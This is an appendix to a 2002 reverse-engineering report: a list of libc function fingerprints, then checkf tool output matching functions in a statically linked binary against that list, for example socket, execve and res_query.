[?] tcsetpgrp 288DF925

[?] tdelete 31C5FD96

[?] tdelete EE1B799B

[?] tdestroy 366125FD

[?] tdestroy_recurse DF5EEB6B

[?] tell E8074C47

[?] telldir F0B13165

[?] tempnam 599C920B

[?] tfind 4D94135F

[?] tfind EFDB3E57

[?] time 58B72F00

[?] timegm C515E074

[?] times E2BC36E1

[?] tmpfile AC64BD74

[?] tmpnam DC0E1DBF

[?] toascii C9FFC546

[?] tolower 45886243

[?] top_check EC6F2D04

[?] toupper 45886243

[?] toupper 53874E14

[?] trecurse DDD812DE

[?] truncate 053AA91B

[?] tsearch 9F8366C6

[?] tsearch F15FE32C

[?] ttyname 85C2A47C

[?] ttyname_r 78962F94

[?] twalk 27C788B8

[?] twalk 9028CDEC

[?] tzset 2B6359B6

[?] tzsetwall 6B503EF2

[?] ufc_dofinalperm 1CF9EDFD

[?] ufc_doit A7A056A2

[?] uflow 77BACE64

[?] uflow D35C5808

[?] ulckpwdf 21B5D6C0

[?] ulimit A40B5642

[?] umask 91FAD98C

[?] umount D84A5F91

[?] un_link 418B2126

[?] un_link D4A78CB3

[?] uname 3506DCE6

[?] unbuffer_all A5E347CE

[?] underflow 77BACE64

[?] underflow D35C5808

[?] ungetc 0D7068C3

[?] unlink 55ED4980

[?] unsave_markers 0AA1F400

[?] unsave_markers B4A01561

[?] unsetenv 5AEA56CA

[?] uselib DC0C57F0

[?] user2netname FE1766D7

[?] usleep 5186CEA1

[?] ustat E9615692

[?] utime 203FFC30

[?] utimes 3B968AB4

[?] utmpname B9AA167A

[?] validuser AC8B49AA

[?] valloc 6BDBFF34

[?] valloc EFE021B2

[?] vasprintf FC6DF307

[?] vfork BCF79788

[?] vfprintf 29F1AC52

[?] vfprintf 5C996D57

[?] vfscanf 1FC2A193

[?] vfscanf B60A2E90

[?] vhangup E51F863F

[?] vm86 97AD7E81

[?] vprintf 03969634

[?] vscanf A18E9BB3

[?] vsnprintf 5B85F0B2

[?] vsprintf F85FE8A7

[?] vsscanf 195F1C46

[?] vsyslog 79C97296

[?] wait BFF0C154

[?] wait3 EFF8CC70

[?] wait4 D7A31154

[?] waitpid 882FFA23

[?] wcrtomb C7627F4B

[?] wcslen CBAA8DA3

[?] wcsmbs_load_conv CB0E702D

[?] wcsnlen A8640171

[?] wcsrtombs C5B3D98B

[?] wcstombs 3578DC06

[?] wctomb FAD9893A

[?] wctype CDE68043

[?] write D9229CA5

[?] write F76BB4B4

[?] writev B57DE9ED

[?] xdecrypt 495138D4

[?] xdr_accepted_reply 2AF4A336

[?] xdr_array D8627568

[?] xdr_authdes_cred 2AF4A336

[?] xdr_authdes_verf 6433F388

[?] xdr_authunix_parms 2AF4A336

[?] xdr_bool F34C4CFA

[?] xdr_bytes E242F89E

[?] xdr_callhdr 937FD516

[?] xdr_callmsg 5428B3B7

[?] xdr_char 68458723

[?] xdr_cryptkeyarg 2AF4A336

[?] xdr_cryptkeyres 2AF4A336

[?] xdr_datum C8C74AE4

[?] xdr_des_block 5C6921D9

[?] xdr_domainname A4E6672B

[?] xdr_double 578C19CA

[?] xdr_enum B49190D8

[?] xdr_float 87991650

[?] xdr_free 1B7D7AA6

[?] xdr_getcredres 2AF4A336

[?] xdr_int B49190D8

[?] xdr_keybuf 16BA2C51

[?] xdr_keystatus 5B2EEDA4

[?] xdr_long 59AADBB6

[?] xdr_mapname D18C9A99

[?] xdr_netnamestr 5EC123ED

[?] xdr_netobj A94C6943

[?] xdr_opaque 77A2F5AB

[?] xdr_opaque_auth 7A0457B0

[?] xdr_passwd 6B295EEE

[?] xdr_peername 592BE8E9

[?] xdr_pmap 2AF4A336

[?] xdr_pmaplist B754822D

[?] xdr_pointer E487C5B3

[?] xdr_reference 051FB1D6

[?] xdr_rejected_reply 2AF4A336

[?] xdr_replymsg 2AF4A336

[?] xdr_rmtcall_args 69D95885

[?] xdr_rmtcallres 22FAC60B

[?] xdr_short F34C4CFA

[?] xdr_string 89A1B37A

[?] xdr_u_char 68458723

[?] xdr_u_int B49190D8

[?] xdr_u_long F219D739

[?] xdr_u_short F34C4CFA

[?] xdr_union 23A8E9D8

[?] xdr_unixcred 2AF4A336

[?] xdr_vector E6176346

[?] xdr_void 24944CA9

[?] xdr_wrapstring 032C5E88

[?] xdr_yp_buf 436D81CB

[?] xdr_yp_inaddr A25BD6CF

[?] xdr_ypbind_binding 16773894

[?] xdr_ypbind_resp 2AF4A336

[?] xdr_ypbind_resptype 5B2EEDA4

[?] xdr_ypbind_setdom 2AF4A336

[?] xdr_ypdelete_args B9EE18B6

[?] xdr_ypmaplist 2AF4A336

[?] xdr_ypmaplist_str 20211222

[?] xdr_yppasswd 6B295EEE

[?] xdr_ypreq_key 40831766

[?] xdr_ypreq_nokey 40831766

[?] xdr_ypresp_all 2AF4A336

[?] xdr_ypresp_all_seq 38A10919

[?] xdr_ypresp_key_val 2AF4A336

[?] xdr_ypresp_maplist 2AF4A336

[?] xdr_ypresp_master 2AF4A336

[?] xdr_ypresp_order 2AF4A336

[?] xdr_ypresp_val 2AF4A336

[?] xdr_ypstat 5B2EEDA4

[?] xdr_ypupdate_args B9EE18B6

[?] xdrmem_create 666B1533

[?] xdrrec_create CD2F801F

[?] xdrrec_endofrecord 57EBF3F7

[?] xdrrec_eof CFD9A3AA

[?] xdrrec_skiprecord F7F7DA7B

[?] xdrstdio_create F48C9A63

[?] xencrypt 495138D4

[?] xmknod B28BA2A7

[?] xprt_register 2CA97BA8

[?] xprt_unregister BE0F18C1

[?] xstat 2CE87F61

[?] xstat 90B558AE

[?] xstat64 71CBE7A1

[?] xustat BF8D51BD

[?] yp_all F63AC897

[?] yp_bind F0839538

[?] yp_check D11E1846

[?] yp_dobind FD99228C

[?] yp_first A9B45F00

[?] yp_get_default_domain 0B24769F

[?] yp_maplist EBE83541

[?] yp_master 5449AA51

[?] yp_match 662BD313

[?] yp_next 052D1A84

[?] yp_order 5449AA51

[?] yp_unbind D92B8837

[?] yp_update A5684FDA

[?] yperr_string 4254458A

[?] ypprot_err E88600C6

 



 


Appendix 13: checkf  output (II)

 

This is the output generated by checkf using our signature file.

 

# ./checkf /root/chroot/reverse/the-binary

./checkf started at Wed May 22 22:29:05 CEST 2002

 

Fingerprint for address 0x8048080 [Function_2] is EE03C2FA

Searching in databases...

    No match found.

 

Fingerprint for address 0x8048110 [Function_3] is FC3FCF37

Searching in databases...

    No match found.

 

Fingerprint for address 0x8048134 [Function_4] is CD18AE48

Searching in databases...

    No match found.

 

Fingerprint for address 0x8048ecc [Function_5] is 7298C1BA

Searching in databases...

    No match found.

 

Fingerprint for address 0x8048f94 [Function_6] is 0B1EDD74

Searching in databases...

    No match found.

 

Fingerprint for address 0x8049138 [Function_7] is 2C245023

Searching in databases...

    No match found.

 

Fingerprint for address 0x8049174 [Function_8] is 297DB45A

Searching in databases...

    No match found.

 

Fingerprint for address 0x8049564 [Function_9] is F66EED9B

Searching in databases...

    No match found.

 

Fingerprint for address 0x80499f4 [Function_10] is 80BC598B

Searching in databases...

    No match found.

 

Fingerprint for address 0x8049d40 [Function_11] is 0410C84C

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a194 [Function_12] is 4D0BAAE1

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a1e8 [Function_13] is 78D5FF45

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a2a8 [Function_14] is CF7AE9FA

Searching in databases...

      1 match(es) found:

    setenv

 

Fingerprint for address 0x804a48c [Function_15] is 5AEA56CA

Searching in databases...

      1 match(es) found:

    unsetenv

 

Fingerprint for address 0x804a4f4 [Function_16] is 5E67E55C

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a580 [Function_17] is C1286BE8

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a5cc [Function_18] is 46A39AF7

Searching in databases...

    No match found.

 

Fingerprint for address 0x804a9d8 [Function_19] is 37608659

Searching in databases...

    No match found.

 

Fingerprint for address 0x804b800 [Function_20] is 26ABB864

Searching in databases...

    No match found.

 

Fingerprint for address 0x804bf80 [Function_21] is 8E1B0B58

Searching in databases...

      1 match(es) found:

    gethostbyname

 

Fingerprint for address 0x804c538 [Function_22] is 04450465

Searching in databases...

    No match found.

 

Fingerprint for address 0x804c574 [Function_23] is 1226BE5F

Searching in databases...

    No match found.

 

Fingerprint for address 0x804c5a4 [Function_24] is 2DF9A0D3

Searching in databases...

    No match found.

 

Fingerprint for address 0x804c6fc [Function_25] is 3449046C

Searching in databases...

    No match found.

 

Fingerprint for address 0x804c9e4 [Function_26] is C9790471

Searching in databases...

    No match found.

 

Fingerprint for address 0x804cb94 [Function_27] is BC083482

Searching in databases...

    No match found.

 

Fingerprint for address 0x804cbe4 [Function_28] is A78C94CD

Searching in databases...

    No match found.

 

Fingerprint for address 0x804ce8c [Function_29] is A341591B

Searching in databases...

      1 match(es) found:

    inet_addr

 

Fingerprint for address 0x804ceb4 [Function_30] is E73408BC

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d02c [Function_31] is 22952808

Searching in databases...

      1 match(es) found:

    dn_expand

 

Fingerprint for address 0x804d2a0 [Function_32] is 4F5285E1

Searching in databases...

      1 match(es) found:

    dn_comp

 

Fingerprint for address 0x804d404 [Function_33] is 1731AA08

Searching in databases...

      1 match(es) found:

    dn_skipname

 

Fingerprint for address 0x804d458 [Function_34] is 8D57D032

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d484 [Function_35] is C61D9F4F

Searching in databases...

    No match found.

 

Fingerprint for address 0x804d6b8 [Function_36] is D0B481BF

Searching in databases...

      1 match(es) found:

    getshort

 

Fingerprint for address 0x804d6d4 [Function_37] is F20F8D33

Searching in databases...

      1 match(es) found:

    getlong

 

Fingerprint for address 0x804d700 [Function_38] is 29D39C77

Searching in databases...

      1 match(es) found:

    putshort

 

Fingerprint for address 0x804d71c [Function_39] is B1774DB7

Searching in databases...

      2 match(es) found:

    ns_put32 putlong

 

Fingerprint for address 0x804d744 [Function_40] is BBDA720D

Searching in databases...

      1 match(es) found:

    res_init

 

Fingerprint for address 0x804de68 [Function_41] is 88954EDE

Searching in databases...

    No match found.

 

Fingerprint for address 0x804df74 [Function_42] is A0653D9F

Searching in databases...

    No match found.

 

Fingerprint for address 0x804dfb4 [Function_43] is 79948C9D

Searching in databases...

      1 match(es) found:

    res_randomid

 

Fingerprint for address 0x804dfe0 [Function_44] is C111875D

Searching in databases...

      1 match(es) found:

    res_query

 

Fingerprint for address 0x804e180 [Function_45] is 18C85831

Searching in databases...

      1 match(es) found:

    res_search

 

Fingerprint for address 0x804e398 [Function_46] is A947F786

Searching in databases...

      1 match(es) found:

    res_querydomain

 

Fingerprint for address 0x804e490 [Function_47] is A9F3F813

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e638 [Function_48] is 5FA14CD9

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e694 [Function_49] is 5FA14CD9

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e6f8 [Function_50] is C8B768A6

Searching in databases...

    No match found.

 

Fingerprint for address 0x804e884 [Function_51] is 5EFD4E52

Searching in databases...

      1 match(es) found:

    res_nameinquery

 

Fingerprint for address 0x804e944 [Function_52] is 6736B356

Searching in databases...

      1 match(es) found:

    res_queriesmatch

 

Fingerprint for address 0x804ea0c [Function_53] is D856E4CE

Searching in databases...

      1 match(es) found:

    res_send

 

Fingerprint for address 0x804f4f8 [Function_54] is 7D568AF4

Searching in databases...

      1 match(es) found:

    res_close

 

Fingerprint for address 0x804f540 [Function_55] is 20B55824

Searching in databases...

      1 match(es) found:

    fclose

 

Fingerprint for address 0x804f5c4 [Function_56] is 2080D969

Searching in databases...

      1 match(es) found:

    fgets

 

Fingerprint for address 0x804f620 [Function_57] is A4F8A71C

Searching in databases...

      2 match(es) found:

    fopen setmntent

 

Fingerprint for address 0x804f680 [Function_58] is 70DCB4D1

Searching in databases...

      3 match(es) found:

    fprintf fscanf fsetpos

 

Fingerprint for address 0x804f6d4 [Function_59] is CF479062

Searching in databases...

      2 match(es) found:

    fread fwrite

 

Fingerprint for address 0x804f734 [Function_60] is C9CF7DFA

Searching in databases...

      1 match(es) found:

    getline

 

Fingerprint for address 0x804f7ec [Function_61] is 9D6614E2

Searching in databases...

      1 match(es) found:

    printf

 

Fingerprint for address 0x804f808 [Function_62] is F2B20976

Searching in databases...

     10 match(es) found:

    asprintf dprintf err errx fprintf fscanf obstack_printf sprintf sscanf syslog

 

Fingerprint for address 0x804f820 [Function_63] is F85FE8A7

Searching in databases...

      1 match(es) found:

    vsprintf

 

Fingerprint for address 0x804f888 [Function_64] is 1D0ADB47

Searching in databases...

    No match found.

 

Fingerprint for address 0x8052c9c [Function_65] is 229A27EF

Searching in databases...

    No match found.

 

Fingerprint for address 0x8052de8 [Function_66] is B12652AB

Searching in databases...

    No match found.

 

Fingerprint for address 0x8052e80 [Function_67] is 6678B01F

Searching in databases...

      1 match(es) found:

    str_init_static

 

Fingerprint for address 0x80530cc [Function_68] is D0895E40

Searching in databases...

      1 match(es) found:

    str_count

 

Fingerprint for address 0x80531dc [Function_69] is 8991BCFD

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054c28 [Function_70] is 2044E47D

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054c7c [Function_71] is B99107E5

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054db8 [Function_72] is B313167F

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054df0 [Function_73] is 8F766134

Searching in databases...

      1 match(es) found:

    setbuf

 

Fingerprint for address 0x8054e54 [Function_74] is CCA065EB

Searching in databases...

    No match found.

 

Fingerprint for address 0x8054eb0 [Function_75] is F2B20976

Searching in databases...

     10 match(es) found:

    asprintf dprintf err errx fprintf fscanf obstack_printf sprintf sscanf syslog

 

Fingerprint for address 0x8054ec8 [Function_76] is 79C97296

Searching in databases...

      1 match(es) found:

    vsyslog

 

Fingerprint for address 0x80552b0 [Function_77] is 73B79883

Searching in databases...

    No match found.

 

Fingerprint for address 0x80553a0 [Function_78] is 7EB9F8D3

Searching in databases...

    No match found.

 

Fingerprint for address 0x80555b0 [Function_79] is 5186CEA1

Searching in databases...

      1 match(es) found:

    usleep

 

Fingerprint for address 0x80555fc [Function_80] is BFA3332C

Searching in databases...

      1 match(es) found:

    execl

 

Fingerprint for address 0x8055668 [Function_81] is 6F2A5448

Searching in databases...

      3 match(es) found:

    getenv libc_fatal unsetenv

 

Fingerprint for address 0x80556cc [Function_82] is 892E25C7

Searching in databases...

      1 match(es) found:

    sleep

 

Fingerprint for address 0x80557e8 [Function_83] is 20D2E00E

Searching in databases...

    No match found.

 

Fingerprint for address 0x80559a0 [Function_84] is BAEE4234

Searching in databases...

    No match found.

 

Fingerprint for address 0x8055e38 [Function_85] is 60DCBA5A

Searching in databases...

    No match found.

 

Fingerprint for address 0x8055ecc [Function_86] is F176DED4

Searching in databases...

      1 match(es) found:

    abort

 

Fingerprint for address 0x8055f08 [Function_87] is D8F7AA72

Searching in databases...

      1 match(es) found:

    atexit

 

Fingerprint for address 0x8055f34 [Function_88] is B1845073

Searching in databases...

      1 match(es) found:

    new_exitfn

 

Fingerprint for address 0x8055fbc [Function_89] is 09B18AA8

Searching in databases...

    No match found.

 

Fingerprint for address 0x805602c [Function_90] is F5D3F741

Searching in databases...

      1 match(es) found:

    mbtowc

 

Fingerprint for address 0x8056058 [Function_91] is 13707179

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056064 [Function_92] is 1886DD5E

Searching in databases...

      2 match(es) found:

    strtol_internal strtoul_internal

 

Fingerprint for address 0x8056450 [Function_93] is 8EB3962C

Searching in databases...

      1 match(es) found:

    bcmp

 

Fingerprint for address 0x8056480 [Function_94] is 7C70C135

Searching in databases...

      1 match(es) found:

    bcopy

 

Fingerprint for address 0x805652c [Function_95] is 326903E6

Searching in databases...

      1 match(es) found:

    memcpy

 

Fingerprint for address 0x8056570 [Function_96] is 0C88B8DB

Searching in databases...

      1 match(es) found:

    memmove

 

Fingerprint for address 0x80565f8 [Function_97] is 14C14735

Searching in databases...

      1 match(es) found:

    strcasecmp

 

Fingerprint for address 0x8056640 [Function_98] is 32D87F9D

Searching in databases...

      1 match(es) found:

    strcpy

 

Fingerprint for address 0x8056664 [Function_99] is 9C321016

Searching in databases...

      1 match(es) found:

    strdup

 

Fingerprint for address 0x80566a4 [Function_100] is 19B0CF11

Searching in databases...

      7 match(es) found:

    ether_aton ether_ntoa lcong48 p_query setkey srand48 strerror

 

Fingerprint for address 0x80566bc [Function_101] is CDC72536

Searching in databases...

      1 match(es) found:

    strncasecmp

 

Fingerprint for address 0x805680c [Function_102] is 0A7C5829

Searching in databases...

      1 match(es) found:

    strncpy

 

Fingerprint for address 0x80568d0 [Function_103] is 7F1FA0D2

Searching in databases...

      1 match(es) found:

    strtok

 

Fingerprint for address 0x8056954 [Function_104] is 054B8B45

Searching in databases...

      2 match(es) found:

    getdomainname gethostname

 

Fingerprint for address 0x80569bc [Function_105] is 8AE66F9A

Searching in databases...

      2 match(es) found:

    signal ssignal

 

Fingerprint for address 0x80569fc [Function_106] is 882FFA23

Searching in databases...

      1 match(es) found:

    waitpid

 

Fingerprint for address 0x8056a2c [Function_107] is 93D3112B

Searching in databases...

      8 match(es) found:

    accept bind connect getpeername getsockname recvmsg sendmsg socket

 

Fingerprint for address 0x8056a74 [Function_108] is 93D3112B

Searching in databases...

      8 match(es) found:

    accept bind connect getpeername getsockname recvmsg sendmsg socket

 

Fingerprint for address 0x8056abc [Function_109] is 93D3112B

Searching in databases...

      8 match(es) found:

    accept bind connect getpeername getsockname recvmsg sendmsg socket

 

Fingerprint for address 0x8056b04 [Function_110] is B5F28613

Searching in databases...

      1 match(es) found:

    listen

 

Fingerprint for address 0x8056b44 [Function_111] is 16E2ECD3

Searching in databases...

      3 match(es) found:

    recv send socketpair

 

Fingerprint for address 0x8056b90 [Function_112] is F380E122

Searching in databases...

      2 match(es) found:

    recvfrom sendto

 

Fingerprint for address 0x8056bf0 [Function_113] is 16E2ECD3

Searching in databases...

      3 match(es) found:

    recv send socketpair

 

Fingerprint for address 0x8056c3c [Function_114] is F380E122

Searching in databases...

      2 match(es) found:

    recvfrom sendto

 

Fingerprint for address 0x8056c9c [Function_115] is CA0F7AED

Searching in databases...

      2 match(es) found:

    getsockopt setsockopt

 

Fingerprint for address 0x8056cf4 [Function_116] is 93D3112B

Searching in databases...

      8 match(es) found:

    accept bind connect getpeername getsockname recvmsg sendmsg socket

 

Fingerprint for address 0x8056d44 [Function_117] is 9C89C698

Searching in databases...

      1 match(es) found:

    libc_init

 

Fingerprint for address 0x8056e14 [Function_118] is A0723E77

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056e64 [Function_119] is 0F9A4C0D

Searching in databases...

    No match found.

 

Fingerprint for address 0x8056e70 [Function_120] is 4151E7BA

Searching in databases...

    No match found.

 

Fingerprint for address 0x8057134 [Function_121] is 20F1D1E3

Searching in databases...

      2 match(es) found:

    chdir libc_chdir

 

Fingerprint for address 0x8057160 [Function_122] is 1C96E7CE

Searching in databases...

      2 match(es) found:

    close libc_close

 

Fingerprint for address 0x805718c [Function_123] is B7E96D35

Searching in databases...

      2 match(es) found:

    dup2 libc_dup2

 

Fingerprint for address 0x80571b8 [Function_124] is B0440C36

Searching in databases...

      2 match(es) found:

    execve libc_execve

 

Fingerprint for address 0x80571e8 [Function_125] is BCF79788

Searching in databases...

      3 match(es) found:

    fork libc_fork vfork

 

Fingerprint for address 0x805720c [Function_126] is 5527EA2B

Searching in databases...

      2 match(es) found:

    geteuid libc_geteuid

 

Fingerprint for address 0x8057230 [Function_127] is 76D8AF69

Searching in databases...

      2 match(es) found:

    getpid libc_getpid

 

Fingerprint for address 0x8057254 [Function_128] is 77C808E9

Searching in databases...

      2 match(es) found:

    gettimeofday libc_gettimeofday

 

Fingerprint for address 0x8057280 [Function_129] is CC4B9A96

Searching in databases...

      2 match(es) found:

    ioctl libc_ioctl

 

Fingerprint for address 0x80572b0 [Function_130] is 975983C9

Searching in databases...

      4 match(es) found:

    kill libc_kill libc_read read

 

Fingerprint for address 0x80572dc [Function_131] is 71E8F5C1

Searching in databases...

      3 match(es) found:

    libc_open open strcat

 

Fingerprint for address 0x805730c [Function_132] is 7F7EF483

Searching in databases...

      2 match(es) found:

    libc_read read

 

Fingerprint for address 0x805733c [Function_133] is DD587118

Searching in databases...

      2 match(es) found:

    libc_setsid setsid

 

Fingerprint for address 0x8057360 [Function_134] is 55EF7871

Searching in databases...

      2 match(es) found:

    libc_sigprocmask sigprocmask

 

Fingerprint for address 0x8057390 [Function_135] is 3506DCE6

Searching in databases...

      2 match(es) found:

    libc_uname uname

 

Fingerprint for address 0x80573bc [Function_136] is 55ED4980

Searching in databases...

      3 match(es) found:

    libc_unlink remove unlink

 

Fingerprint for address 0x80573e8 [Function_137] is D9229CA5

Searching in databases...

      2 match(es) found:

    libc_write write

 

Fingerprint for address 0x8057418 [Function_138] is E43431A9

Searching in databases...

      2 match(es) found:

    alarm libc_alarm

 

Fingerprint for address 0x8057444 [Function_139] is 58B72F00

Searching in databases...

      2 match(es) found:

    libc_time time

 

Fingerprint for address 0x8057470 [Function_140] is A7CD6533

Searching in databases...

      2 match(es) found:

    libc_syscall_writev syscall_writev

 

Fingerprint for address 0x80574a0 [Function_141] is 19F45966

Searching in databases...

    No match found.

 

Fingerprint for address 0x80574c8 [Function_142] is 885E11CD

Searching in databases...

    No match found.

 

Fingerprint for address 0x805751c [Function_143] is 6116998A

Searching in databases...

      1 match(es) found:

    sigsuspend

 

Fingerprint for address 0x8057554 [Function_144] is 84D91FB0

Searching in databases...

      1 match(es) found:

    exit

 

Fingerprint for address 0x805756c [Function_145] is 168E4F1E

Searching in databases...

      1 match(es) found:

    setfpucw

 

Fingerprint for address 0x80575c0 [Function_146] is 27AD3901

Searching in databases...

      1 match(es) found:

    memchr

 

Fingerprint for address 0x8057764 [Function_147] is 4E05FA21

Searching in databases...

      1 match(es) found:

    memset

 

Fingerprint for address 0x80577c0 [Function_148] is 4DC57DD1

Searching in databases...

      1 match(es) found:

    strcat

 

Fingerprint for address 0x8057970 [Function_149] is 1CF2A0E6

Searching in databases...

      2 match(es) found:

    index strchr

 

Fingerprint for address 0x8057adc [Function_150] is 1871BDD8

Searching in databases...

      1 match(es) found:

    strcmp

 

Fingerprint for address 0x8057b04 [Function_151] is A5AB5D81

Searching in databases...

      1 match(es) found:

    strncmp

 

Fingerprint for address 0x8057b30 [Function_152] is B5505CCB

Searching in databases...

      1 match(es) found:

    strpbrk

 

Fingerprint for address 0x8057be8 [Function_153] is 760EB382

Searching in databases...

      2 match(es) found:

    rindex strrchr

 

Fingerprint for address 0x8057db0 [Function_154] is E6D707D8

Searching in databases...

      1 match(es) found:

    strspn

 

Fingerprint for address 0x8057e64 [Function_155] is 5117B726

Searching in databases...

      1 match(es) found:

    isinf

 

Fingerprint for address 0x8057e98 [Function_156] is A71A8A57

Searching in databases...

      1 match(es) found:

    isinfl

 

Fingerprint for address 0x8057ed8 [Function_157] is BA45B0EA

Searching in databases...

      1 match(es) found:

    isnan

 

Fingerprint for address 0x8057f0c [Function_158] is 00C88D19

Searching in databases...

      1 match(es) found:

    isnanl

 

Fingerprint for address 0x8057f48 [Function_159] is C84ECCA9

Searching in databases...

      1 match(es) found:

    mpn_cmp

 

Fingerprint for address 0x8057f88 [Function_160] is 2B18C414

Searching in databases...

      1 match(es) found:

    mpn_extract_double

 

Fingerprint for address 0x8058094 [Function_161] is 7653F971

Searching in databases...

      1 match(es) found:

    mpn_divmod

 

Fingerprint for address 0x8058634 [Function_162] is 84FF8010

Searching in databases...

      1 match(es) found:

    mpn_extract_long_double

 

Fingerprint for address 0x8058710 [Function_163] is 25EB0928

Searching in databases...

      1 match(es) found:

    mpn_lshift

 

Fingerprint for address 0x805876c [Function_164] is 8CFF30F8

Searching in databases...

      1 match(es) found:

    mpn_mul

 

Fingerprint for address 0x8058de0 [Function_165] is 8A34610C

Searching in databases...

      3 match(es) found:

    mpn_addmul_1 mpn_mul_1 mpn_submul_1

 

Fingerprint for address 0x8058e20 [Function_166] is B0BF2543

Searching in databases...

      1 match(es) found:

    _mpn_mul_n_basecase

 

Fingerprint for address 0x8059048 [Function_167] is 56DED7A7

Searching in databases...

      1 match(es) found:

    _mpn_mul_n

 

Fingerprint for address 0x805971c [Function_168] is 96D0E79C

Searching in databases...

      1 match(es) found:

    _mpn_sqr_n_basecase

 

Fingerprint for address 0x8059938 [Function_169] is 3B6F07EF

Searching in databases...

      1 match(es) found:

    _mpn_sqr_n

 

Fingerprint for address 0x8059fb0 [Function_170] is FB7ADB4A

Searching in databases...

      1 match(es) found:

    mpn_rshift

 

Fingerprint for address 0x805a010 [Function_171] is 618AE777

Searching in databases...

      2 match(es) found:

    mpn_add_n mpn_sub_n

 

Fingerprint for address 0x805a0b0 [Function_172] is 8A34610C

Searching in databases...

      3 match(es) found:

    mpn_addmul_1 mpn_mul_1 mpn_submul_1

 

Fingerprint for address 0x805a0f0 [Function_173] is AAB4E03F

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a11c [Function_174] is 3BD66190

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a254 [Function_175] is C28BB62A

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a584 [Function_176] is 7988B25C

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a5c4 [Function_177] is FEAB4850

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a634 [Function_178] is C6E90B65

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a6c8 [Function_179] is 3A8D9AB5

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a720 [Function_180] is 06DE6CD6

Searching in databases...

    No match found.

 

Fingerprint for address 0x805a7e4 [Function_181] is 0EA1161E

Searching in databases...

    No match found.

 

Fingerprint for address 0x805aac0 [Function_182] is 1D392289

Searching in databases...

    No match found.

 

Fingerprint for address 0x805af2c [Function_183] is 410086A5

Searching in databases...

    No match found.

 

Fingerprint for address 0x805af5c [Function_184] is 0E99D34D

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b010 [Function_185] is F61BB71E

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b048 [Function_186] is ADB71136

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b10c [Function_187] is 70BDF232

Searching in databases...

      1 match(es) found:

    localtime

 

Fingerprint for address 0x805b128 [Function_188] is 99F3DF3E

Searching in databases...

      2 match(es) found:

    gmtime_r localtime_r

 

Fingerprint for address 0x805b144 [Function_189] is CD7FD9F8

Searching in databases...

      2 match(es) found:

    init libc_init_first

 

Fingerprint for address 0x805b1c4 [Function_190] is 5275C6C5

Searching in databases...

      1 match(es) found:

    tsearch

 

Fingerprint for address 0x805b4e0 [Function_191] is C974FB0E

Searching in databases...

      1 match(es) found:

    asctime_r

 

Fingerprint for address 0x805b530 [Function_192] is 15161384

Searching in databases...

      3 match(es) found:

    asctime hcreate p_query

 

Fingerprint for address 0x805b548 [Function_193] is 7FABD94C

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b584 [Function_194] is 31F0BA20

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b5e0 [Function_195] is D672966D

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b61c [Function_196] is 29C9A4B3

Searching in databases...

    No match found.

 

Fingerprint for address 0x805b914 [Function_197] is BB0496A9

Searching in databases...

    No match found.

 

Fingerprint for address 0x805ba88 [Function_198] is 9D152729

Searching in databases...

    No match found.

 

Fingerprint for address 0x805bb34 [Function_199] is 0CC50A70

Searching in databases...

    No match found.

 

Fingerprint for address 0x805bb64 [Function_200] is D57BF6FC

Searching in databases...

    No match found.

 

Fingerprint for address 0x805bbf4 [Function_201] is 0CA08232

Searching in databases...

    No match found.

 

Fingerprint for address 0x805bd74 [Function_202] is AAFC256F

Searching in databases...

      2 match(es) found:

    libc_malloc malloc

 

Fingerprint for address 0x805c290 [Function_203] is E2E398CD

Searching in databases...

      3 match(es) found:

    cfree free libc_free

 

Fingerprint for address 0x805c7dc [Function_204] is D41EDAD7

Searching in databases...

      2 match(es) found:

    libc_memalign memalign

 

Fingerprint for address 0x805c904 [Function_205] is DABBD265

Searching in databases...

      2 match(es) found:

    calloc libc_calloc

 

Fingerprint for address 0x805c944 [Function_206] is B87CA97F

Searching in databases...

    No match found.

 

Fingerprint for address 0x805ca24 [Function_207] is 1B4975C9

Searching in databases...

    No match found.

 

Fingerprint for address 0x805ccb0 [Function_208] is 91D4FFBF

Searching in databases...

    No match found.

 

Fingerprint for address 0x805cdf0 [Function_209] is 1B958055

Searching in databases...

    No match found.

 

Fingerprint for address 0x805ce84 [Function_210] is FD99228C

Searching in databases...

      1 match(es) found:

    yp_dobind

 

Fingerprint for address 0x805d2f4 [Function_211] is 7A663592

Searching in databases...

    No match found.

 

Fingerprint for address 0x805d328 [Function_212] is 1BE95F40

Searching in databases...

    No match found.

 

Fingerprint for address 0x805d3a8 [Function_213] is 662BD313

Searching in databases...

      1 match(es) found:

    yp_match

 

Fingerprint for address 0x805d5f8 [Function_214] is 20B3BA59

Searching in databases...

    No match found.

 

Fingerprint for address 0x805d638 [Function_215] is A9B45F00

Searching in databases...

      1 match(es) found:

    yp_first

 

Fingerprint for address 0x805d814 [Function_216] is 052D1A84

Searching in databases...

      1 match(es) found:

    yp_next

 

Fingerprint for address 0x805dfe0 [Function_217] is 7835A19F

Searching in databases...

    No match found.

 

Fingerprint for address 0x805e110 [Function_218] is 06DDAD48

Searching in databases...

      1 match(es) found:

    catopen

 

Fingerprint for address 0x805e3fc [Function_219] is C13B28AA

Searching in databases...

      1 match(es) found:

    MCGetSet

 

